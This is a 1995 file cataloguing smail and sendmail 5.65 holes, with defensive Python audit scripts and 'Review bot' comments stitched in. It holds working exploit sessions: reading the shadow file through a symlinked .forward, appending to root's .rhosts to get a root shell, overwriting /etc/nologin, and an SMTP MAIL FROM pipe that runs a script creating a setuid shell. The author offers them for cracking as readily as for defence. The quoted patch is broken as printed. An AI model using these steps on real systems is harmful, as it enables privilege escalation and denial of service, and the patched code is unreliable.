from Hacknet, Postmaster@hacknet.demon.co.uk

Introduction and Legal Ramble

This is written for anyone that's interested in learning about the many security holes resident in many versions of
smail and sendmail. I do not care if you use it to protect your system against others, or to crack other people's systems... just don't involve me in
it. 

I wrote it to collate all the information on sendmail into one list for convenience, and perhaps it will help some people. 

I would like to thank the unknown person who started this off a long time ago.... 

This paper is (c) 1995; however, I do not object to you including any of this in a FAQ, printed magazine, book etc... just mail
me first so I know where it's distributed *:^) 

Have you spotted a mistake or anything I could add? Then add your own stuff, put yourself down in the credits and
mail it to me :) 

Note: This is v.01b, so there are bound to be mistakes, and there is a lot of other stuff to add as well.... and maybe expand it to include
FTP daemon bugs?
I am extremely busy and am only releasing it due to popular demand. 

Oh, please tell me what versions these work on! 



Bug #1

Version affected: smail 3.1.28 (this is a smail bug, not a sendmail one; the session below is from Smail3.1.28.1). Any more? 

SYNOPSIS

Use of ~/.forward together with smail's debugging output lets a local user read any file on the system. 

EXAMPLE OF EXPLOITATION

Contrary to popular belief, adding -smtp_debug to your smail config file will not prevent this bug from occurring. It only
prevents exploitation via the SMTP port; a local user can still start smail in SMTP mode themselves (-bs) with verbose
debugging turned up (-v20). In the session below the user's ~/.forward has been linked to the shadow password file: smail,
being setuid, opens the forward file when it expands the address, and the debugging output echoes what it read as the
"forwarded to" list. 

We can just do this.... 

user@psyops ~> smail -bs -v20
expand_string($primary_name Smail$version ready for mail on $date,(null),
(null)) called
expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail on
Mon, 5 Sep 94 12:15 PDT
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15
PDT
expn user

[same text as before]

expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile:  opening forward file /home/user/.forward

[more of same text]

read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[.....]


process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection

To fix this, remove the -d and -v debugging options from smail (an unprivileged user must not be able to turn on debugging output in a setuid program) as well as adding -smtp_debug to your config file. 
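Bug #1 and Bug #2 both hinge on what a local user puts in ~/.forward, and smail will also deliver to any file named there. The audit below is an added example, not code from this article or from smail: it walks a /home-style tree and flags a .forward that is a symlink, entries that pipe mail into a command, and entries that deliver to a file outside the owner's home directory (so it goes beyond Bug #1 to file-delivery entries in general). The home layout (<root>/<user>/.forward), the .forward syntax it assumes (entries separated by commas or newlines, '#' starting a comment) and the demo() fixture are assumptions made for the example.

```python
"""Audit ~/.forward files for what smail will do with them.

Added example for this article, not smail's or the author's code.  Flags:
  * a .forward that is a symlink (Bug #1: its target is read with smail's
    privileges and echoed by -v/-d debugging output);
  * entries that pipe mail into a command;
  * entries that deliver to a file outside the owner's home directory.
Assumed: homes live under one root (<root>/<user>), and a .forward entry
list is separated by commas or newlines with '#' starting a comment.
"""
import os
import tempfile


def parse_forward(text):
    """Split a .forward body into its entries (assumed syntax, see above)."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        for item in line.split(","):
            item = item.strip().strip('"')
            if item:
                entries.append(item)
    return entries


def inside(path, home):
    """True if path resolves to home itself or somewhere under it."""
    home_real = os.path.realpath(home)
    real = os.path.realpath(path)
    return real == home_real or real.startswith(home_real + os.sep)


def audit_forward(path, home):
    """Return (severity, message) findings for one user's .forward file."""
    findings = []
    if os.path.islink(path):
        # Do not read through the link: if it points at /etc/shadow that is
        # exactly the Bug #1 read we want to report, not repeat.
        findings.append(("HIGH", "%s is a symlink to %s"
                         % (path, os.path.realpath(path))))
        return findings
    try:
        with open(path) as fh:
            text = fh.read()
    except OSError as exc:
        return [("INFO", "%s unreadable: %s" % (path, exc))]
    for entry in parse_forward(text):
        if entry.startswith("|"):
            findings.append(("HIGH", "%s pipes mail to %r" % (path, entry)))
        elif entry.startswith(("/", "~")):
            # smail's appendfile transport treats these as file names;
            # "~/x" means the owner's home, "~other/x" someone else's.
            if entry == "~" or entry.startswith("~/"):
                dest = os.path.join(home, entry[2:])
            else:
                dest = os.path.expanduser(entry)
            if not inside(dest, home):
                findings.append(("HIGH", "%s delivers to %s outside %s"
                                 % (path, os.path.realpath(dest), home)))
    return findings


def audit_tree(home_root):
    """Audit every <home_root>/<user>/.forward; returns {user: findings}."""
    results = {}
    for user in sorted(os.listdir(home_root)):
        fwd = os.path.join(home_root, user, ".forward")
        if os.path.lexists(fwd):
            results[user] = audit_forward(fwd, os.path.join(home_root, user))
    return results


def demo():
    """Constructed fixture: a throw-away home tree with four users."""
    root = tempfile.mkdtemp(prefix="fwdaudit")
    forwards = {
        "alice": "bob@example.org, ~/Mail/inbox\n",    # benign
        "mallory": "/etc/nologin\n",                    # Bug #3 style
        "eve": '"|/usr/bin/vacation eve"\n',            # program delivery
    }
    for user, body in forwards.items():
        os.makedirs(os.path.join(root, user))
        with open(os.path.join(root, user, ".forward"), "w") as fh:
            fh.write(body)
    # trent's .forward is a symlink to a file outside his home (Bug #1 style);
    # "secret" stands in for /etc/shadow.
    os.makedirs(os.path.join(root, "trent"))
    secret = os.path.join(root, "secret")
    with open(secret, "w") as fh:
        fh.write("root:x:0:0::/:/bin/sh\n")
    os.symlink(secret, os.path.join(root, "trent", ".forward"))
    return audit_tree(root)
```

Run as root (so every .forward is readable) with audit_tree("/home"); a symlinked .forward is reported without following it, so the audit itself does not repeat the privileged read.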



Bug #2

Version affected: smail 3.1.28 (again a smail bug, not sendmail). Any more? 

SYNOPSIS

Smail called with the -D flag (send debugging output to the named file) opens that file with its setuid privileges, so an ordinary user can create, or append to, any file on the system. 

EXAMPLE OF EXPLOITATION

Put an rhosts-style line in ~/.forward, then run smail with -D naming root's .rhosts. The debugging output, which includes
the contents of the forward file, is appended to that file as root, and rsh then accepts the new entry:

user@psyops ~> cat > ~/.forward

localhost user
^D
user@psyops ~> smail -bs -D ~root/.rhosts -v20
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12
:23 PDT
expn user
250 user
quit
221 psyops.warez.mil closing connection

user@psyops ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)

Patch this by removing the -D option from smail. 

I received the following patch recently. I haven't tested it, so use at your own risk. 

*** Omain.c     Wed Mar 11 12:33:18 1993
--- main.c      Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
      }

-     /*
-      * change error file to debugging file from -D option, if any
-      */
-
-     if (arg_debug_file) {
-       new_errfile =3D fopen(arg_debug_file, "a");
-       if (new_errfile =3D=3D NULL) {
-           write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
-                     arg_debug_file, strerrno(errno));
-           arg_debug_file =3D NULL;
-       } else {
-           errfile =3D new_errfile;
-           fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n",
-                   program, (long)getpid());
-       }
-     }

      /*
       * read in the transport, router and director files, if needed
       *
       * NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
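Review bot: this hunk deletes the open of the -D debug file from its pre-setuid position but leaves nothing in its place, so everything logged between here and the relocated open (including the transport, router and director file reads named in the context directly below) still goes to the default errfile rather than to the -D file. That is acceptable, but it should be stated next to the "-D now requires full pathname" note in the second hunk so nobody reports it as a regression.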
***************
*** 525,530 ****
--- 508,537 ----
      if (prog_euid !=3D REQUIRED_EUID)
      queue_only =3D TRUE;
  #endif

+     /*
+      * change error file to debugging file from -D option, if any
+      *
+      * JMJ: Change location of this fragment to below the setuid/setgid
+      *      calls to allow for use of fopen_as_user() instead of just
+      *      fopen().
+      *
+      *      Side effect: -D now requires full pathname to debug file
+      */
+
+     if (arg_debug_file) {
+       new_errfile =3D fopen_as_user(arg_debug_file, "a", 1, real_uid,
+           prog_egid, 0600);
+           write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+                     arg_debug_file, strerrno(errno));
+           arg_debug_file =3D NULL;
+       } else {
+           errfile =3D new_errfile;
+           fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n",
+                   program, (long)getpid());
+       }
+     }

      /*
       * error processing can be other than TERMINAL only for
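Review bot: the NULL check is missing from the relocated block: after `new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid, prog_egid, 0600);` there is no `if (new_errfile == NULL) {` line, so the `write_log(...)` and `arg_debug_file = NULL;` lines run unconditionally and the `} else {` that follows has no matching `if`; as quoted the hunk will not compile. Restore that line between the open and the write_log call. With it in place the fix itself is sound: opening the file as real_uid with mode 0600, after the setuid handling, means `-D ~root/.rhosts` fails for an ordinary user as it should, and the comment is right that the path now has to be absolute.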



Bug #3

Version affected: ? (smail; the fix below is to its transports file) 

SYNOPSIS

Files named in ~/.forward can be created in any directory, regardless of that directory's permissions. (The file is still owned by
the mailbox owner, however, which is exactly what lets the owner fill it afterwards.) 

EXAMPLE OF EXPLOITATION

Name the target file in ~/.forward, send yourself a message so that smail creates it, then write to the file you now own
(>! is csh's clobber-override redirect):

user@psyops ~> echo "/etc/nologin" > ~/.forward
user@psyops ~> mail -r root user < /dev/null
user@psyops ~> echo "Site shutdown due to smail lameness" >! /etc/nologin
user@psyops ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.

Plug this hole by adding 'check_path' to the file transport in /usr/lib/smail/transports, so that the path to the file is checked before it is opened: 

[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file:   driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = $user,                   # file is taken from address
        append_as_user,                 # use user-id associated with address
        expand_user,                    # expand ~ and $ within address
        check_path,                     # <-- add this line
        suffix = "\n",
        mode = 0644
[....]
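To check that every appendfile transport which takes the file name from the address has check_path set, here is an added example (not smail's code and not the article's) that parses the transports file format shown above: generic attributes up to the ';', driver attributes after it, attributes written as 'attr', 'attr = value' or '-attr' (false), separated by commas, with '#' starting a comment outside double quotes. SAMPLE_TRANSPORTS is a constructed file modelled on the fragment above, and the flagging rule (file = $user or expand_user, without check_path) is this example's own heuristic, not a smail rule.

```python
"""Parse smail's transports file and report appendfile transports that take
the file name from the address but lack check_path (the Bug #3 condition).

Added example, not smail's or the article's code.  The format handled is
the one in the fragment above: "name: generic attrs ; driver attrs", with
attributes written as "attr", "attr = value" or "-attr" (false), separated
by commas, and '#' starting a comment outside double quotes.
"""
import re

# Constructed sample modelled on /usr/lib/smail/transports (not a real file).
SAMPLE_TRANSPORTS = """\
# local - deliver to the system mailbox
local:  driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = /var/spool/mail/${lc:user},
        group = mail,
        mode = 0660,
        suffix = "\\n",
        append_as_user

# file - deliver mail to files named in the address (the vulnerable form)
file:   driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = $user,                   # file is taken from address
        append_as_user,                 # use user-id associated with address
        expand_user,                    # expand ~ and $ within address
        suffix = "\\n",
        mode = 0644

pipe:   driver = pipe,
        return_path, local, from, unix_from_hack;

        cmd = "/bin/sh -c $user",
        parent_env, ignore_status, -log_output, umask = 0022
"""

NAME_RE = re.compile(r"^(\w+)\s*:(.*)$")   # a new entry starts in column 1


def strip_comment(line):
    """Drop a '#' comment unless the '#' sits inside double quotes."""
    out, quoted = [], False
    for ch in line:
        if ch == '"':
            quoted = not quoted
        elif ch == "#" and not quoted:
            break
        out.append(ch)
    return "".join(out)


def split_unquoted(text, sep):
    """Split on sep, ignoring separators inside double quotes."""
    parts, cur, quoted = [], [], False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        if ch == sep and not quoted:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return parts


def parse_attrs(text):
    """'attr' -> True, '-attr' -> False, 'attr = value' -> 'value'."""
    attrs = {}
    for item in split_unquoted(text, ","):
        item = item.strip()
        if not item:
            continue
        if "=" in item:
            key, value = item.split("=", 1)
            attrs[key.strip()] = value.strip().strip('"')
        elif item.startswith("-"):
            attrs[item[1:].strip()] = False
        else:
            attrs[item] = True
    return attrs


def _finish(body):
    generic, _, driver = "\n".join(body).partition(";")
    return {"generic": parse_attrs(generic), "driver": parse_attrs(driver)}


def parse_transports(text):
    """Return {transport name: {"generic": {...}, "driver": {...}}}."""
    transports, name, body = {}, None, []
    for raw in text.splitlines():
        line = strip_comment(raw)
        m = NAME_RE.match(line)
        if m:
            if name is not None:
                transports[name] = _finish(body)
            name, body = m.group(1), [m.group(2)]
        elif name is not None:
            body.append(line)
    if name is not None:
        transports[name] = _finish(body)
    return transports


def unchecked_file_transports(transports):
    """Names of appendfile transports whose file comes from the address
    (file = $user, or expand_user set) without check_path.  This flagging
    rule is the example's own heuristic."""
    bad = []
    for name, t in transports.items():
        if t["generic"].get("driver") != "appendfile":
            continue
        drv = t["driver"]
        address_is_path = (drv.get("file", "").strip() == "$user"
                           or drv.get("expand_user") is True)
        if address_is_path and drv.get("check_path") is not True:
            bad.append(name)
    return bad
```

On a live system read /usr/lib/smail/transports into parse_transports() and treat any name returned by unchecked_file_transports() as the transport to fix; the local mailbox transport is not flagged because its file attribute is a fixed spool path, not the address.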



Bug #4

Version affected: sendmail 5.65 (the session below is 5.65c/IDA-1.4.4); others? 

SYNOPSIS

Sendmail 5.65 accepts a program address (|command) as the envelope sender. When it later sends mail back to that sender
(here triggered by the Return-Receipt-To header), the daemon runs the "address": /usr/ucb/tail pipes the end of the
message, which is a shell script, into /usr/bin/sh. 

from CSC FAQ: 

A SAMPLE EXPLOITATION

A sample session follows. 

---cut here
[panix!jhawk] |% telnet panix.com 25
Trying 198.7.0.2 ...
Connected to panix.com.
Escape character is '^]'.
220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13 -0500
HELO
250 Hello panix.com, why do you call yourself ?
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: jhawk@panix.com (John Hawkinson)
To: jhawk@panix.com (John Hawkinson)
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen

Hi there. Wanna play ball?

#!/bin/sh
#The above line is just in case :-)
echo This is a Serious Bug > /tmp/bug
echo id reports: >> /tmp/bug
/usr/bin/id >> /tmp/bug
echo Fixing this would be good >> /tmp/bug
cp /bin/sh /tmp/bugshell
chmod u+s /tmp/bugshell
echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug
chmod ugo+rx /tmp/bugshell
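A check for this class of abuse in captured SMTP traffic or a server transcript, as an added example that is not from the CSC FAQ or from sendmail: it flags envelope senders and recipients, and message headers, whose address is a program (a leading '|', optionally inside <> or quotes), which is the pattern used above in MAIL FROM and Return-Receipt-To, and it reports the version the 220 banner announces. SAMPLE_SESSION is a constructed transcript modelled on the one above; the host names in it are placeholders.

```python
"""Scan an SMTP session transcript for program addresses (|command) in the
envelope and in message headers, the sendmail 5.65 abuse shown above.

Added example, not sendmail's or the FAQ's code.  Assumes a transcript in
which server replies start with a three-digit code and client commands and
message data do not, and that message data runs from the 354 reply to the
lone '.' line.
"""
import re

# Constructed session modelled on the panix.com transcript above.
SAMPLE_SESSION = """\
220 mail.example.net 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13 -0500
HELO attacker.example.org
250 Hello attacker.example.org, pleased to meet you
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: someone@example.org
To: root@example.net
Return-Receipt-To: |foobar
Subject: hello

#!/bin/sh
cp /bin/sh /tmp/bugshell
.
250 Ok
MAIL FROM: <alice@example.org>
250 <alice@example.org>... Sender ok
RCPT TO: <bob@example.net>
250 <bob@example.net>... Recipient ok
QUIT
221 mail.example.net closing connection
"""

REPLY_RE = re.compile(r"^\d{3}[ -]")
ENVELOPE_RE = re.compile(r"^(MAIL FROM|RCPT TO)\s*:\s*(.*)$", re.IGNORECASE)
HEADER_RE = re.compile(r"^([\w-]+):\s*(.*)$")
BANNER_RE = re.compile(r"^220 \S+ (\S+) Sendmail")


def is_program_address(addr):
    """True when the address names a program to run: a leading '|',
    possibly wrapped in <> or double quotes."""
    a = addr.strip().strip("<>").strip().strip('"').strip()
    return a.startswith("|")


def banner_version(text):
    """Version string from the 220 greeting, or None if not a sendmail banner."""
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if m:
            return m.group(1)
    return None


def scan_session(text):
    """Return [(line number, "envelope"|"header", name, address)] findings."""
    findings = []
    in_data = in_headers = False
    for lineno, line in enumerate(text.splitlines(), 1):
        if in_data:
            if line == ".":                 # end of message data
                in_data = False
            elif in_headers:
                if line == "":              # blank line ends the headers
                    in_headers = False
                else:
                    m = HEADER_RE.match(line)
                    if m and is_program_address(m.group(2)):
                        findings.append((lineno, "header", m.group(1), m.group(2)))
            continue
        if REPLY_RE.match(line):            # server reply
            if line.startswith("354"):
                in_data = in_headers = True
            continue
        m = ENVELOPE_RE.match(line)         # client command
        if m and is_program_address(m.group(2)):
            findings.append((lineno, "envelope", m.group(1).upper(), m.group(2)))
    return findings
```

Only the header block is inspected, so the shell script in the body is not itself a finding; the program address that would execute it is, and a 5.65 banner together with such a finding is the combination to alert on.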